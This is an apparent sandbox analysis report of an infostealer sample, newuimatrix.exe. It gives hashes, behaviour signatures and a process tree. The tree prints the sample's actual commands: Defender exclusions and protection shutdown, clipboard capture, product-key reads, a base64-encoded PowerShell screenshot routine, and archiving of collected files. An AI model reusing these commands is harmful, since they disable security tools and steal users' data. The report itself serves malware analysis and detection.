Analysis

  • max time kernel
    30s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-01-2025 01:57

General

  • Target

    newuimatrix.exe

  • Size

    7.6MB

  • MD5

    b18d4487b45439fe5fd09d50d9a0f351

  • SHA1

    8b355309f3108e49a5a31dacfd82874a5545460c

  • SHA256

    7eee726aa01a187ba7da7d9fe4bc05824da24dd82746b7096d6011edaac12e4e

  • SHA512

    bbbb7685a7b2ff0a6031240eb35a439252b07d814a6685041573ffcd06e8b00f87c66792793dc3727d3bfd647fe5a904adeffcf30ac3e9b756dc1230081144ae

  • SSDEEP

    196608:o2D+kdMdmwfI9jUCBB7m+mKOY7rXrZusooDmhfvsbnTNWE:b5+3IHL7HmBYXrYoaUNL

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\newuimatrix.exe
    "C:\Users\Admin\AppData\Local\Temp\newuimatrix.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:864
    • C:\Users\Admin\AppData\Local\Temp\newuimatrix.exe
      "C:\Users\Admin\AppData\Local\Temp\newuimatrix.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3436
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\newuimatrix.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2332
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\newuimatrix.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3812
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3208
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2412
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('roblox isnt open', 0, 'inject', 32+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('roblox isnt open', 0, 'inject', 32+16);close()"
          4⤵
            PID:2424
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ​‍.scr'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5020
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ​‍.scr'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3456
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4208
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4528
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3816
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2720
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1064
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3128
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:4064
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Clipboard Data
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2544
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2668
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:516
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4444
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:3528
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4720
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:1648
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:740
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2356
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\302cbtjt\302cbtjt.cmdline"
                5⤵
                  PID:2740
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC2C.tmp" "c:\Users\Admin\AppData\Local\Temp\302cbtjt\CSC71CE932F4DD945AD99F313E067B69BAF.TMP"
                    6⤵
                      PID:1744
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:5028
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:2528
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4548
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:4088
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4224
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:4864
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:3668
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:1520
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:2712
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:2252
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "getmac"
                              3⤵
                                PID:4612
                                • C:\Windows\system32\getmac.exe
                                  getmac
                                  4⤵
                                    PID:4108
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI8642\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\wyBUK.zip" *"
                                  3⤵
                                    PID:2996
                                    • C:\Users\Admin\AppData\Local\Temp\_MEI8642\rar.exe
                                      C:\Users\Admin\AppData\Local\Temp\_MEI8642\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\wyBUK.zip" *
                                      4⤵
                                      • Executes dropped EXE
                                      PID:3596
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                    3⤵
                                      PID:2804
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic os get Caption
                                        4⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4664
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                      3⤵
                                        PID:4288
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic computersystem get totalphysicalmemory
                                          4⤵
                                            PID:3464
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                          3⤵
                                            PID:2688
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic csproduct get uuid
                                              4⤵
                                                PID:728
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                              3⤵
                                                PID:2200
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:3268
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                3⤵
                                                  PID:4744
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic path win32_VideoController get name
                                                    4⤵
                                                    • Detects videocard installed
                                                    PID:4620
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                  3⤵
                                                    PID:2128
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                      4⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1844
                                              • C:\Windows\System32\rundll32.exe
                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                1⤵
                                                  PID:1776

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                  SHA1

                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                  SHA256

                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                  SHA512

                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  cadef9abd087803c630df65264a6c81c

                                                  SHA1

                                                  babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                                                  SHA256

                                                  cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                                                  SHA512

                                                  7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  b736b1cf455023520eb7abb7f35ddaa2

                                                  SHA1

                                                  f3d04d1c5d14eb92c1e466ee4767ea65680b4070

                                                  SHA256

                                                  3530522d67a50208cbc38ada3fc1ce9c3f858488e1573e2cf1da6748040b8849

                                                  SHA512

                                                  5bff0ecabba8d72a06456a54911e623e519b4ed78d21e32de94cfae5e21636f46e5134c95abd184b43fec7fd2fd0a12087a330eb3cd41cb5507db4a1996c5158

                                                • C:\Users\Admin\AppData\Local\Temp\302cbtjt\302cbtjt.dll

                                                  Filesize

                                                  4KB

                                                  MD5

                                                  461fac399545d8cbd84855ff6cbe8524

                                                  SHA1

                                                  f550fdb658926a3675f342fd850452c5043c3c1e

                                                  SHA256

                                                  92832f079b89f390489347e9686659fcfa8822c63d3b6100de7b4f1b2a8cbb9e

                                                  SHA512

                                                  15c851d0488e313c02aaf25f0a27c943fd18406f3f6858cdbaa09cf6b6cec968118934dbb833d3568d04ced26074fffb09a4c4d12d5bcf8519b843408f963dd6

                                                • C:\Users\Admin\AppData\Local\Temp\RESBC2C.tmp

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  d1fff71140b246ae23d34d4be5abd4d9

                                                  SHA1

                                                  f5219673c1e6611fa1baab8301d6a2b777a3bd7d

                                                  SHA256

                                                  7bae392971e90b4f9a3957f36444d1285af9e6454e1a10658ca830cf559b9c40

                                                  SHA512

                                                  4af8ed487bb46974c868d09154261f99c9c2f29e9dcf0c9b56750b853c309f941f12225bf2e8744755d2b9856744856e2a3689f11f33c1f2fbd83de29a9cdd28

                                                • C:\Users\Admin\AppData\Local\Temp\_MEI8642\VCRUNTIME140.dll

                                                  Filesize

                                                  117KB

                                                  MD5

                                                  862f820c3251e4ca6fc0ac00e4092239

                                                  SHA1

